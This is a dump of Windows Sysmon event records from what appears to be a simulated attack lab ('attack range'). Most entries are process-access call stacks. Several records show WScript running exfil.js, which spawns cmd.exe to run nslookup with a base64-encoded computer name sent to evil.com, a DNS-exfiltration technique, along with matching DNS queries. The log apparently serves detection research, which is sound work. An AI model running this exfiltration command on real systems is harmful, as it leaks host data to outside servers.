14:16:18.704{2E1864BB-17B2-629A-F53E-000000005F02}73922864C:\Windows\system32\cmd.exe{2E1864BB-17B2-629A-F73E-000000005F02}5392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.704{2E1864BB-17B2-629A-F73E-000000005F02}5392C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B2-629A-F53E-000000005F02}7392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmix.tmp 2>&1 10341000x8000000000000000196947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.666{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-F63E-000000005F02}7476C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.666{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-F63E-000000005F02}7476C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.666{2E1864BB-17B2-629A-F63E-000000005F02}74764536C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-F53E-000000005F02}7392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.651{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-F63E-000000005F02}7476C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.651{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.651{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.635{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.635{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.635{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-F53E-000000005F02}7392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.635{2E1864BB-17A1-629A-783D-000000005F02}55527836C:\Windows\System32\WScript.exe{2E1864BB-17B2-629A-F53E-000000005F02}7392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.649{2E1864BB-17B2-629A-F53E-000000005F02}7392C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmix.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000196936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.635{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.635{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.635{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.635{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.621{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.621{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.621{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.621{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.621{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000196927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.621{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmewa.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000196926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.596{00000000-0000-0000-0000-000000000000}5400evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.497{00000000-0000-0000-0000-000000000000}884evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.394{00000000-0000-0000-0000-000000000000}5816evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.228{00000000-0000-0000-0000-000000000000}3724evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.069{00000000-0000-0000-0000-000000000000}7544evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.913{00000000-0000-0000-0000-000000000000}7212evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.752{00000000-0000-0000-0000-000000000000}3596evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.629{00000000-0000-0000-0000-000000000000}1636evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.481{00000000-0000-0000-0000-000000000000}5776evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.317{00000000-0000-0000-0000-000000000000}4100evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000196916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.567{2E1864BB-17B2-629A-F33E-000000005F02}50407376C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-F43E-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 